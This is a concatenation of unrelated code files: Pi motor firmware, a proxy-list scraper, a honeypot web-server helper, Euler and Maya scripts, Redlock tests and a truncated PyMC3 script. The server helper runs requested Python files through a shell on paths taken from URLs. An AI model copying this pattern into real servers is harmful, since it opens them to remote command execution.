\"mRF\":\n if int(msg.payload[4:])>20: runMotor2(1,int(msg.payload[4:])-20,0)#2\n runMotor(0,msg.payload[4:],1)#3\n if msg.payload[:3] == \"mRS\":\n mStop()\n if msg.payload[:3] == \"mLB\":\n if int(msg.payload[4:])>20: runMotor2(1,int(msg.payload[4:])-20,1)#2\n runMotor(0,msg.payload[4:],0)#3\n if msg.payload[:3] == \"mLF\":\n runMotor2(1,msg.payload[4:],0)#2\n if int(msg.payload[4:])>20: runMotor(0,int(msg.payload[4:])-20,1)#3\n if msg.payload[:3] == \"mLS\":\n motorStop2()\n if msg.payload[:3] == \"mBB\":\n runMotor2(1,msg.payload[4:],1)#2\n runMotor(0,msg.payload[4:],0)#3\n if msg.payload[:3] == \"mFS\":\n motorStop()\n if msg.payload[:3] == \"mFF\":#4\n runMotor2(1,msg.payload[4:],0)#2\n runMotor(0,msg.payload[4:],1)#3\n if msg.payload[:3] == \"mBS\":\n mStop()\n if msg.payload == \"World!\":\n print(\"Received message #2, do something else\")\n # Do something else\n \n# CPU temperature\ndef measure_temp(client):\n global topic\n temp = os.popen('vcgencmd measure_temp').readline()\n client.publish(topic,(temp.replace(\"temp=\",\"\").replace(\"'C\\n\",\"\")))\n#motor functions\n\ndef iniMotors():\n GPIO.output(12, GPIO.LOW)\n GPIO.output(18, GPIO.LOW)\n GPIO.output(16, GPIO.LOW)\n GPIO.output(22, GPIO.LOW)\n GPIO.output(15, GPIO.LOW)\n GPIO.output(13, GPIO.LOW)\n GPIO.output(11, GPIO.LOW)\n \n GPIO.output(19, GPIO.LOW)\n GPIO.output(23, GPIO.LOW)\n GPIO.output(21, GPIO.LOW)\n GPIO.output(24, GPIO.LOW)\n GPIO.output(29, GPIO.LOW)\n GPIO.output(26, GPIO.LOW)\n GPIO.output(31, GPIO.LOW) \n\ndef m2(spd):\n runMotor(0,spd,0)\n\ndef m1(spd):\n runMotor(1,spd,0)\n\ndef m4(spd):\n runMotor2(0,spd,0)\n\ndef m3(spd):\n runMotor2(1,spd,0)\n\ndef runMotor(motor, spd, direction):\n# print(\"-\"+str(spd)+\"-\")\n global currentSpd\n currentSpd=spd\n GPIO.output(22, GPIO.HIGH);\n in1 = GPIO.HIGH\n in2 = GPIO.LOW\n if(direction == 1):\n in1 = GPIO.LOW\n in2 = GPIO.HIGH\n \n if(motor == 0):\n GPIO.output(16, in1)\n GPIO.output(18, in2)\n elif(motor == 1):\n GPIO.output(15, in1)\n GPIO.output(13, in2)\n\ndef runMotor2(motor, spd, direction):\n# global pwma2\n# global pwmb2\n global currentSpd\n currentSpd=spd\n GPIO.output(24, GPIO.HIGH);\n in1 = GPIO.HIGH\n in2 = GPIO.LOW\n if(direction == 1):\n in1 = GPIO.LOW\n in2 = GPIO.HIGH\n \n if(motor == 0):\n GPIO.output(21, in1)\n GPIO.output(23, in2)\n# pwma2.ChangeDutyCycle(spd)\n #print(\"hem canviat3\")\n elif(motor == 1):\n GPIO.output(29, in1)\n GPIO.output(26, in2)\n# pwmb2.ChangeDutyCycle(spd)\n #print(\"hem canviat4\")\n\ndef mStop():\n iniMotors()\n #motorStop()\n #motorStop2()\n #m1Working = False\n\ndef motorStop():#m1 m2\n GPIO.output(22, GPIO.LOW)\n GPIO.output(15, GPIO.LOW)\n GPIO.output(16, GPIO.LOW)\n\ndef motorStop2():#m3 m4\n GPIO.output(24, GPIO.LOW)\n GPIO.output(29, GPIO.LOW)\n GPIO.output(21, GPIO.LOW)\n\n\"\"\"\nclient = mqtt.Client(userdata=pwmb1)\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect(ipR2B2, 1883, 60)\n#client.loop_start()\nclient.loop_forever()\n\"\"\"\ndef ping():\n global start_time\n start_time=time.time()\n\ndef main(args=None):\n # Create an MQTT client and attach our routines to it.\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n client.on_disconnect = on_disconnect\n client.connect(ipR2B2, 1883, 60)\n m1Working=0\n #client.loop_forever()\n client.loop_start()\n pwmFreq=100\n pwma1 = GPIO.PWM(12, pwmFreq) # pin 18 to PWM \n pwmb1 = GPIO.PWM(11, pwmFreq) # pin 13 to PWM\n\n pwma2 = GPIO.PWM(19, pwmFreq) # pin 18 to PWM \n pwmb2 = GPIO.PWM(31, pwmFreq) # pin 13 to PWM\n \n pwma1.start(50)\n pwmb1.start(50)\n pwma2.start(50)\n pwmb2.start(50)\n \n global currentSpd\n global oldSpd\n global start_time\n \n currentSpd = 50\n oldSpd = 50\n \n iniMotors()\n while True:\n #loop\n if currentSpd!=oldSpd:\n print(\"ei\")\n print(currentSpd)\n pwma1.ChangeDutyCycle(float(currentSpd))\n pwmb1.ChangeDutyCycle(float(currentSpd))\n pwma2.ChangeDutyCycle(float(currentSpd))\n pwmb2.ChangeDutyCycle(float(currentSpd))\n oldSpd=currentSpd\n if time.time() - start_time > 3: mStop() #elapsed time\n \n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"Code/firmwarePi.py","file_name":"firmwarePi.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"486240652","text":"import requests\nimport re\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36\"\n }\nurl=\"https://proxy.coderbusy.com/classical/anonymous-type/highanonymous.aspx?page=2\"\nhtml = requests.get(url=url,headers=headers)\nres=html.text\n\nif res:\n find_ips = re.compile('(.*?)', re.S)\n ip_ports = find_ips.findall(res)\n print(ip_ports)\n for ip in ip_ports:\n a= ip[0].replace(\"'\",'').strip()\n b= ip[1].replace(\"'\",'').strip()\n c= a + ':' + b\n print(c)\n\n # for address_port in ip_ports:\n # yield address_port\n","sub_path":"spider/day01/RRRedis.py","file_name":"RRRedis.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"19036403","text":"import math\nimport ssl\nimport subprocess\nimport time\nfrom os import getcwd, listdir, path, stat, walk\nfrom socket import AF_INET, SO_REUSEADDR, SOCK_STREAM, SOL_SOCKET, socket\n\nfrom .constants import (AUTH_FILE, CODES, HTTP_VERSION, ROOT,\n SSL_CERT, SSL_KEY, WEBSITE_URL)\n\n\n\"\"\"\n Checks headers for request and determines if the client is authorized to view the file or not\n\"\"\"\ndef is_authorized(headers):\n auth_entry = [h for h in headers if \"Authorization: Basic \" in h]\n\n if not auth_entry:\n return False\n\n client_auth = auth_entry[0].split()[-1].strip()\n with open(AUTH_FILE, 'r') as auth:\n server_auth = auth.readline().strip()\n return server_auth == client_auth\n\n\n\"\"\"\n Parses incoming client request from the socket and returns necessary information\n\"\"\"\ndef parse_request(client_request):\n try:\n file_request = client_request[0].split()\n client_command = file_request[0] # COMMAND\n client_request_uri = file_request[1] # REQUEST_URI\n if client_request_uri == \"/\" or client_request_uri == \"/index.html\": # / --> /index.html for HTTP servers\n client_request_uri = \"/index.html\"\n if client_request_uri[-1] == \"/\":\n client_request_uri = client_request_uri[:-1] # If there's a trailing '/' (like for a directory listing), get rid of it\n if \"%20\" in client_request_uri: # Catches corner case for file with space in name - %20 used instead of space in URLs\n client_request_uri = client_request_uri.replace(\"%20\", \" \")\n if file_exists(ROOT + client_request_uri):\n filepath = ROOT + client_request_uri\n else:\n filepath = None\n version = file_request[2]\n headers = client_request[1:]\n\n return client_request_uri, client_command, filepath, version, headers\n\n except Exception as e:\n print(e)\n # Something went wrong while parsing - 400 Error\n return None, None, None, None, None\n\n\n\"\"\"\n Gets the file extension for the requested file in the server\n\"\"\"\ndef get_content_type(path, code=200):\n if code != 200:\n return None, \"text/html\"\n\n file_extension = path.split('.')[-1]\n if file_extension == \"txt\":\n filetype = \"text/plain\"\n elif file_extension == \"png\" or file_extension == \"jpg\" or file_extension == \"gif\":\n filetype = \"image/\" + file_extension\n elif file_extension == \"ico\":\n filetype = \"image/x-icon\"\n elif file_extension == \"svg\" or file_extension == \"xml\":\n filetype = \"image/svg+xml\"\n elif file_extension == \"html\":\n filetype = \"text/html\"\n elif file_extension == \"py\":\n filetype = \"text/plain\" # usually would be 'application/x-python-code', but we want the output to print to the browser\n elif file_extension == \"mp4\":\n filetype = \"video/mp4\"\n else:\n filetype = \"text/plain\"\n\n return file_extension, filetype\n\n\n\"\"\"\n Walks server_root directory and returns the filepath for the requested URI (or None if not present)\n\"\"\"\ndef file_exists(uri):\n if uri is None:\n return None\n directory = uri.strip(\"/\")\n directory = '/'.join((uri).split(\"/\")[:-1])\n target = uri.split(\"/\")[-1]\n print(f\"LOOKING FOR {target} in {directory}\")\n try:\n dir_files = listdir(directory)\n except Exception:\n return False\n\n return True if target in dir_files else False\n\n\n\"\"\"\n Gets data in a readable format for the requested URI on the server\n\"\"\"\ndef get_data(filepath, file_size, code):\n if file_size == 0:\n return create_response_html(code), \"text/html\"\n\n # Open file and get data\n filetype, content_type = get_content_type(filepath, code)\n if filetype == \"py\":\n # File is executable - execute and return output\n cmd = \"python3 \" + path.join(getcwd(), filepath)\n data = subprocess.check_output(cmd, shell=True)\n else:\n # File isn't an executable file - read as normal\n read_mode = \"r\" if content_type == \"text/plain\" else \"rb\" # rb for images, r for text\n try:\n if filepath == ROOT + \"/index.html\":\n filepath = ROOT\n raise IsADirectoryError\n with open(filepath, read_mode) as requested_file:\n data = requested_file.read(file_size)\n except IsADirectoryError:\n # Requested filepath is a directory - print directory html!\n data = get_directory_html(filepath)\n content_type = \"text/html\"\n return data, content_type\n\n\n\"\"\"\n Returns the path of some icon in /icons - used for directory listing\n Support for: folder, README, video, image, text, unknown\n\"\"\"\ndef get_file_icon(filepath):\n content_type = str(get_content_type(filepath))\n if path.isdir(filepath):\n return \"../icons/folder.gif\"\n elif \"README\" in filepath:\n return \"../icons/hand_right.gif\"\n elif \"video\" in content_type:\n return \"../icons/movie.gif\"\n elif \"image\" in content_type:\n return \"../icons/image.gif\"\n elif \"text\" in content_type:\n return \"../icons/text.gif\"\n else:\n return \"../icons/unknown.gif\"\n\n\n\"\"\"\n Gets size of a file and converts it into the largest reasonable unit\n\"\"\"\ndef get_size(filepath):\n sizes = [\"B\", \"K\", \"M\", \"G\"]\n original_size = stat(filepath).st_size\n size = original_size\n count = 0\n while size >= 1024 and count <= 3:\n size /= 1024\n count = count + 1\n \n return original_size, (str(math.trunc(size * 100) / 100)) + sizes[count]\n\n\n\"\"\"\n Prints html for a directory\n\"\"\"\ndef get_directory_html(filepath):\n html_filepath = filepath + \"/\"\n if html_filepath.split(\"/\")[0] == ROOT:\n html_filepath = \"/\" + '/'.join(html_filepath.split(\"/\")[1:])\n files = listdir(filepath)\n file_html = []\n\n # Parent directory (if not at root)\n if html_filepath != \"/\":\n parent_dir = \"/\".join(html_filepath.split(\"/\")[:-2])\n if parent_dir == \"\":\n parent_dir = \"/\"\n file_html.append(f'Parent Directory')\n\n for f in files:\n dir_file = (filepath + \"/\" + f).strip(\"/\")\n file_created = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(stat(dir_file).st_mtime))\n file_size = get_size(dir_file)[1]\n if path.isdir(dir_file):\n f = f + \"/\"\n file_html.append(f'{f}{file_created} {file_size}')\n\n file_html = \"\\n\".join(file_html)\n\n return f\"\"\"\n \n \n \n Index of {html_filepath}\n \n \n

    Index of {html_filepath}

    \n \n \n \n {file_html}\n \n
    NameLast modifiedSize


    \n

    \n \n

    \n \n \n \"\"\"\n\n\n\"\"\"\n Create HTTP response with following format:\n \n \n ...\n \n\"\"\"\ndef create_response(code, command, filepath, response_headers, file_size=0):\n response_data, content_type = get_data(filepath, file_size, code) # Data to send\n if response_data == \"504\".encode():\n code = 504\n file_size = 0 # Set back to zero, otherwise it will return the contents of the script!\n response_data, content_type = get_data(filepath, file_size, code)\n \n response = HTTP_VERSION + \" \" + str(code) + \" \" + CODES[code][0] + \"\\r\\n\" # HTTP/1.1 \n if code == 301:\n # 301 Moved Permanently is used to redirect HTTP Requests to HTTPS domain\n response += f\"Location: {WEBSITE_URL}\\r\\n\"\n elif code == 401:\n # 401 Unauthorized response must include Authorization Header\n response += 'WWW-Authenticate: Basic realm=\"ChrisCohen-Webserver\"\\r\\n'\n\n response += \"Content-Length: \" + str(len(response_data)) + \"\\r\\n\" # Content-Length: \n response += f\"Content-Type: {content_type}\\r\\n\\r\\n\" # Content-Type: \n \n return response, response_data\n\n\n\"\"\"\n Creates html version of HTTP response\n\"\"\"\ndef create_response_html(code):\n return f\"\"\"\n \n \n \n Chris Cohen's Web Server\n \n \n

    {code} {CODES[code][0]}

    \n

    {CODES[code][1]}

    \n
    \n
    \n \n \n \"\"\"\n\n\n\"\"\"\n Creates and binds a TCP socket that is listening for connections on the specified port number\n Lots of help setting this up from 'https://speakerdeck.com/markush/ssl-all-the-things-pycon-nz-2016?slide=18'\n\"\"\"\ndef create_tcp_sock(host, port):\n server_sock = socket(AF_INET, SOCK_STREAM) # Creates a TCP socket ready for use\n server_sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # Makes used port immediately available after termination of server\n #server_sock.settimeout(15) # Makes socket raise SocketTimeout after 15 seconds of inactivity\n server_sock.bind((host, port)) # Binds the TCP socket for use from any address\n server_sock.listen(5) # Listens for connections on socket\n\n # SSL\n context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\n context.load_cert_chain(certfile=SSL_CERT, keyfile=SSL_KEY)\n context.set_ciphers('EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH')\n\n print(f\"Listening on {host}:{port}...\")\n return server_sock, context\n","sub_path":"honeypot/server_root/vars/http_helper.py","file_name":"http_helper.py","file_ext":"py","file_size_in_byte":10400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"574051773","text":"inputTriangle = \"\"\"75\n95 64\n17 47 82\n18 35 87 10\n20 04 82 47 65\n19 01 23 75 03 34\n88 02 77 73 07 63 67\n99 65 04 28 06 16 70 92\n41 41 26 56 83 40 80 70 33\n41 48 72 33 47 32 37 16 94 29\n53 71 44 65 25 43 91 52 97 51 14\n70 11 33 28 77 73 17 78 39 68 17 57\n91 71 52 38 17 14 91 43 58 50 27 29 48\n63 66 04 68 89 53 67 30 73 16 69 87 40 31\n04 62 98 27 23 09 70 98 73 93 38 53 60 04 23\"\"\"\n\ndef formatTriangle(inputTriangle):\n triangle = []\n for line in inputTriangle.split(\"\\n\"):\n lineList = []\n for n in line.split(\" \"):\n lineList.append(int(n))\n triangle.append(lineList)\n return triangle\n\n####recursive brute force method startign from bottom -- slow\n#gets all possible combinations going up\ndef getPath(triangle, row, path):\n #at the top of the triangle\n if row == 0:\n # print(\"hello\", [0] + path)\n return [0] + path\n else:\n #can always only go to 0 on the next row if in 0 position\n if path[0] == 0:\n return getPath(triangle, row - 1, [0] + path)\n #can always only go to last positon if in last position\n elif path[0] == len(triangle[row]):\n return getPath(triangle, row - 1, [len(triangle[row]) - 1] + path)\n #compare numbers above and work out which path will create the greatest sum\n else:\n if sumPath(triangle, getPath(triangle, row - 1, [path[0]] + path)) > sumPath(triangle, getPath(triangle, row -1, [path[0] - 1] + path)):\n return getPath(triangle, row - 1, [path[0]] + path)\n else:\n return getPath(triangle, row -1, [path[0] - 1] + path)\n\n\n\ndef sumPath(triangle, path):\n sum = 0\n for i in range(len(path)):\n sum += triangle[i][path[i]]\n return sum\n\ntriangle = formatTriangle(inputTriangle)\n\nlastRow = triangle[len(triangle) - 1]\nsums = []\n#\n# #get the max values in every 2nd index for the last row (smaller ones dont need to be ever checked)\n# for i in range(0, len(lastRow), 2):\n# path = []\n# if(i != len(lastRow) -1 and lastRow[i] < lastRow[i] + 1):\n# path = getPath(triangle, len(triangle) - 2, [i + 1])\n# else:\n# path = getPath(triangle, len(triangle) - 2, [i])\n#\n#\n# sums.append(sumPath(triangle,path))\n#\n# print(\"max path sum: \", max(sums))\n# ###\n\ndef fastSum(triangle):\n trianglesSummed = triangle\n for row in range(len(triangle) - 2, -1, -1):\n for i in range(len(triangle[row])):\n if(trianglesSummed[row + 1][i] > trianglesSummed[row + 1][i + 1]):\n trianglesSummed[row][i] = trianglesSummed[row + 1][i] + triangle[row][i]\n else:\n trianglesSummed[row][i] = trianglesSummed[row + 1][i + 1] + triangle[row][i]\n return trianglesSummed[0]\n\n\nprint(fastSum(formatTriangle(inputTriangle)))\n\n\n\n","sub_path":"EulerPython/18. Maximum path sum I.py","file_name":"18. Maximum path sum I.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"403246751","text":"#!/usr/bin/python\n##############################################\n# unpack a packapp.py output file\n# % unpaclapp.py packed1 -v\n# apptools.appRun('unpaclapp.py', args...)\n# apptools.appCall(UnpackApp, args...)\n##############################################\n\nfrom textpacl import marker\nimport StreamApp # real: from PP3E.System.App.Kinds.redirect import StreamApp\n\nclass UnpackApp(StreamApp):\n def start(self):\n StreamApp.start(self)\n self.endargs() # ignore more -o's, etc\n def run(self):\n mlen = len(marker)\n while True:\n line = self.readline()\n if not line: break\n elif line [:mlen] != marker:\n self.write(line)\n else:\n name = line[mlen:].strip()\n self.message('creating: ' + name)\n self.setOutput(name)\n\nif __name__ == '__main__': UnpackApp().main()\n","sub_path":"Python/ProgramPython/c6/unpackapp.py","file_name":"unpackapp.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"565871675","text":"# Treasure Map\n# Instructions\n# You are going to write a program which will mark a spot with an X.\n\n# In the starting code, you will find a variable called `map`.\n# This ```map``` contains a nested list.\n# When ```map``` is printed this is what the nested list looks like:\n\n# ['⬜️', '⬜️', '⬜️'],['⬜️', '⬜️', '⬜️'],['⬜️', '⬜️', '⬜️']\n\n# In the starting code, we have used new lines (```\\n```) to format the three rows into a square, like this:\n\n# ['⬜️', '⬜️', '⬜️']\n# ['⬜️', '⬜️', '⬜️']\n# ['⬜️', '⬜️', '⬜️']\n\n# This is to try and simulate the coordinates on a real map. \n\n# Your job is to write a program that allows you to mark a square on the map using a two-digit system. \n# First your program must take the user input and convert it to a usable format.\n# Next, you need to use it to update your nested list with an \"x\". \n\n# The first digit is the vertical column number and the second digit is the horizontal row number. e.g.:\n# Example Input 1: column 2, row 3 would be entered as: 23\n\n# Example Output 1:\n\n# ['⬜️', '⬜️', '⬜️']\n\n# ['⬜️', '⬜️', '⬜️']\n\n# ['⬜️', 'X', '⬜️']\n\n# Example Input 2: column 3, row 1 would be entered as: 31\n\n# Example Output 2:\n\n# ['⬜️', '⬜️', 'X']\n\n# ['⬜️', '⬜️', '⬜️']\n\n# ['⬜️', '⬜️', '⬜️']\n\n\n# # Hint\n\n# 1. Remember that Lists start at index 0!\n# 2. ```map``` is just a variable that contains a nested list. It's not related to the map function in Python.\n\n# 🚨 Don't change the code below 👇\n# 1 2 3 COLUMNS\nrow1 = [\"⬜️\",\"⬜️\",\"⬜️\"] # 1 R\nrow2 = [\"⬜️\",\"⬜️\",\"⬜️\"] # 2 O\nrow3 = [\"⬜️\",\"⬜️\",\"⬜️\"] # 3 WS\nmap = [row1, row2, row3]\nprint(f\"{row1}\\n{row2}\\n{row3}\")\nposition = input(\"Where do you want to put the treasure? \")\n# 🚨 Don't change the code above 👆\n#Write your code below this row 👇\n\n# rows first column last/next\n# If the input given is 23 it will move 2 rows 3 columns\n\nx_position = int(position[0]) #2 since they are still strings we'll change them to intergers -> int()\ny_position = int(position[1]) #3\n\n# On row 2 rows and column 3 put X\nmap[x_position - 1][y_position - 1] = \"X\"\n\n#Write your code above this row 👆\n\n# 🚨 Don't change the code below 👇\nprint(f\"{row1}\\n{row2}\\n{row3}\")\n","sub_path":"Day 4/day-4-3-treasure-map.py","file_name":"day-4-3-treasure-map.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254722769","text":"import maya.cmds as cmds\nimport os\nimport random\nimport math\n\n\nclass AR_poly(object):\n use = None\n\n def showUI(cls, uifile):\n win = cls(uifile)\n win.create()\n return win\n\n def __init__(self, filepath):\n AR_poly.use = self\n self.window = '0000'\n self.uifile = filepath\n\n def create(self):\n if cmds.window(self.window, exists=True):\n cmds.deleteUI(self.window)\n\n self.window = cmds.loadUI(uiFile=self.uifile, verbose=True)\n cmds.showWindow(self.window)\n\n\nclass tplink(object):\n use = None\n\n def __init__(self, pname, long, shipname='ship'):\n\n self.pname = pname\n self.long = long\n\n\n #self.abgle = abgle\n self.name = shipname\n self.eel = []\n self.vortname = 'vortX'\n tplink.use = self\n\n\n\n def create(self, *args):\n agle = None\n try:\n path = '|'.join(['box','getagle'])\n agle = float(cmds.textField(path,q=True,text=True))\n except:raise\n\n abgle = (math.pi / 180) * agle\n\n\n self.kkk =int( 180/agle)\n\n high = None\n try :\n high_path = '|'.join(['box','gethigh'])\n high = float(cmds.textField(high_path,q = True,text = True))\n except : raise\n\n\n\n pnumber = None\n try:\n pnumber_path = '|'.join(['box','getpnumber'])\n pnumber = int(cmds.textField(pnumber_path,q=True,text = True))\n except:raise\n\n\n for i in range(pnumber):\n self.eel.append((random.uniform(-1, 1), random.uniform(-1*high, high), random.uniform(-1 * self.long, self.long)))\n for i in range(self.kkk):\n for i in range(pnumber):\n cos = math.cos(abgle * i)\n sin = math.sin(abgle * i)\n self.eel.append((self.eel[i][0] * cos + self.eel[i][2] * sin, self.eel[i][1],\n self.eel[i][2] * cos - self.eel[i][0] * sin))\n\n cmds.particle(jbp=self.eel, n=self.name, c=1)\n\n cmds.setAttr(\"%sShape.particleRenderType\" % self.name, 4)\n\n\n\n\n\n\n\n def link(self, *args):\n cmds.vortex(n=self.vortname, pos=(0, 0, 0), m=5, ay=1, att=1, mxd=-1, vsw=360, tsr=0.5)\n\n cmds.connectAttr('%s.outputForce[0]' % self.vortname, '%sShape.inputForce[0]' % self.name)\n cmds.connectAttr('%sShape.fieldData' % self.name, '%s.inputData[0]' % self.vortname)\n cmds.connectAttr('%sShape.ppFieldData[0]' % self.name, '%s.inputPPData[0]' % self.vortname)\nopcc = tplink( pname='fut', long=20)\nwin = AR_poly(os.path.join(os.getenv('HOME'), 'poly.ui'))\nwin.create()\n","sub_path":"Nebula.py","file_name":"Nebula.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"97217742","text":"# -*- coding: utf-8 -*-\r\n\r\nimport re \r\npattern = r'\\d+'\r\nwith open (\"len4.txt\") as f:\r\n file = f.read();\r\n\r\neach_first = file.split(\"\\n\")[:-1]\r\n\r\n\r\nfor i in range(0,len(each_first)):\r\n if each_first[i]== '*':\r\n each_first[i]= '0M0'\r\n\r\nif (len(each_first)%2 != 0) :\r\n each_first.append('0M0')\r\n \r\ntotal =[] \r\n\r\nfor i in range(0,len(each_first)):\r\n string = str(each_first[i])\r\n each = re.findall(pattern,string)\r\n for j in range(len(each)):\r\n if each[j]=='':\r\n each[j]=0\r\n total.append(each[j]) \r\nsummary = []\r\nfor i in range(0,len(total),2):\r\n first = int(total[i])\r\n second = int (total[i+1])\r\n sum = first + second\r\n summary.append(sum)\r\n\r\n\r\nMax_value = max(summary)\r\nprint (Max_value)\r\n\r\n\r\n","sub_path":"Find_coverage/find_length.py","file_name":"find_length.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"14963995","text":"# Copyright 2016 Internap\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport threading\nfrom time import sleep\nimport unittest\nimport fakeredis\n\nfrom mock import patch\nfrom redlock import Redlock, Lock\nfrom redlock_fifo.extensible_redlock import ExtensibleRedlock\n\nfrom testutils import FakeRedisCustom, get_servers_pool\n\n\nclass ExtensibleRedlockTest(unittest.TestCase):\n\n @patch('redis.StrictRedis', new=FakeRedisCustom)\n def setUp(self):\n self.redlock = ExtensibleRedlock(get_servers_pool(active=1, inactive=0))\n self.redlock_with_51_servers_up_49_down = Redlock(get_servers_pool(active=51, inactive=49))\n self.redlock_with_50_servers_up_50_down = Redlock(get_servers_pool(active=50, inactive=50))\n\n def tearDown(self):\n fakeredis.DATABASES = {}\n\n def test_bad_connection_info(self):\n with self.assertRaises(Warning):\n Redlock([{\"cat\": \"hog\"}])\n\n def test_should_be_able_to_lock_a_resource_after_it_has_been_unlocked(self):\n lock = self.redlock.lock(\"shorts\", 10)\n self.assertIsInstance(lock, Lock)\n self.redlock.unlock(lock)\n lock = self.redlock.lock(\"shorts\", 10)\n self.assertIsInstance(lock, Lock)\n\n def test_safety_property_mutual_exclusion(self):\n \"\"\"\n At any given moment, only one client can hold a lock.\n \"\"\"\n lock = self.redlock.lock(\"shorts\", 100000)\n self.assertIsInstance(lock, Lock)\n bad = self.redlock.lock(\"shorts\", 10)\n self.assertFalse(bad)\n\n def test_liveness_property_A_deadlocks_free(self):\n \"\"\"\n Eventually it is always possible to acquire a lock,\n even if the client that locked a resource crashed or gets partitioned.\n \"\"\"\n lock_A = self.redlock_with_51_servers_up_49_down.lock(\"shorts\", 500)\n self.assertIsInstance(lock_A, Lock)\n sleep(1)\n lock_B = self.redlock_with_51_servers_up_49_down.lock(\"shorts\", 1000)\n self.assertIsInstance(lock_B, Lock)\n\n def test_liveness_property_B_fault_tolerance(self):\n \"\"\"\n As long as the majority of Redis nodes are up, clients are able to acquire and release locks.\n \"\"\"\n lock_with_majority = self.redlock_with_51_servers_up_49_down.lock(\"shorts\", 100000)\n self.assertIsInstance(lock_with_majority, Lock)\n\n lock_without_majority = self.redlock_with_50_servers_up_50_down.lock(\"shorts\", 100000)\n self.assertEqual(lock_without_majority, False)\n\n def test_locks_are_released_when_majority_is_not_reached(self):\n \"\"\"\n [...] clients that fail to acquire the majority of locks,\n to release the (partially) acquired locks ASAP [...]\n \"\"\"\n lock = self.redlock_with_50_servers_up_50_down.lock(\"shorts\", 10000)\n self.assertEqual(lock, False)\n\n for server in self.redlock_with_50_servers_up_50_down.servers:\n self.assertEqual(server.get('shorts'), None)\n\n def test_avoid_removing_locks_created_by_other_clients(self):\n \"\"\"\n [...] avoid removing a lock that was created by another client.\n \"\"\"\n lock_A = self.redlock.lock(\"shorts\", 100000)\n self.assertIsInstance(lock_A, Lock)\n\n lock_B = Lock(validity=9000, resource='shorts', key='abcde')\n self.redlock.unlock(lock_B)\n\n for server in self.redlock.servers:\n self.assertEqual(server.get('shorts'), lock_A.key)\n\n def test_two_at_the_same_time_only_one_gets_it(self):\n threads = []\n threads_that_got_the_lock = []\n\n def get_lock_and_register(thread_name, redlock, resource, output):\n lock = redlock.lock(resource, 100000)\n if lock:\n output.append(thread_name)\n\n for i in range(2):\n thread = threading.Thread(\n target=get_lock_and_register, args=(i, self.redlock, 'shorts', threads_that_got_the_lock)\n )\n thread.start()\n threads.append(thread)\n\n for t in threads:\n t.join()\n\n self.assertEqual(len(threads_that_got_the_lock), 1)\n\n def test_a_lock_can_be_extended(self):\n lock = self.redlock.lock(\"shorts\", 500)\n self.redlock.extend(lock, 1000)\n sleep(0.6)\n for server in self.redlock.servers:\n self.assertEqual(server.get('shorts'), lock.key)\n\n\n","sub_path":"tests/test_extensible_redlock.py","file_name":"test_extensible_redlock.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"119391268","text":"import pymc3 as pm\nimport numpy as np\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nimport theano.tensor as T\n\n# from pymc3 import get_data\n\nnp.set_printoptions(precision=0, suppress=True)\n# 2017.11.11编辑\n# ======================================================================\n# 数据导入\n# ======================================================================\ndag_data = np.genfromtxt(\"E:/Code/Bayescode/QW_reliable/First_model/XZsingal.csv\",\n skip_header=1, usecols=[1, 2, 3, 4, 5, 6, 7, 8], delimiter=\",\")\nelec_data = pd.read_csv('XZsingal.csv')\n\n# 计算同一公司产品测试地点数目\ncompanies_num = elec_data.counts.unique()\ncompanies = len(companies_num) # companies=7, 共7个测试地点\ncompany_lookup = dict(zip(companies_num, range(len(companies_num))))\ncompany = elec_data['company_code'] = elec_data.counts.replace(company_lookup).values # 加一行数据在XZsingal文件中\n# companys = elec_data.counts.values - 1 # 这一句以上面两行功能相同\n\n# elec_count = elec_data.counts.values\n\nelec_year = elec_data.Year.values # 观测时间值X1\nelec_year1 = (elec_year-np.mean(elec_year))/np.std(elec_year)\nelec_tem = elec_data.Tem.values # 观测温度值X2\nelec_tem1 = (elec_tem-np.mean(elec_tem))/np.std(elec_tem)\n# 计算故障率大小:故障数目/总测量数,作为模型Y值,放大1000倍以增加实际效果,结果中要缩小1000倍\n# elec_fault = elec_data.Fault / elec_data.Nums\nelec_faults = 1000*(elec_data.Fault.values / elec_data.Nums.values) # 数组形式\nelec_faults1 = (elec_faults-np.mean(elec_faults))/np.std(elec_faults)\n\n# ======================================================================\n# 模型建立:\n# 模型1:using pymc3 GLM自建立模型,Normal分布更优\n# 模型2: 自己模型\n# ======================================================================\ndata = 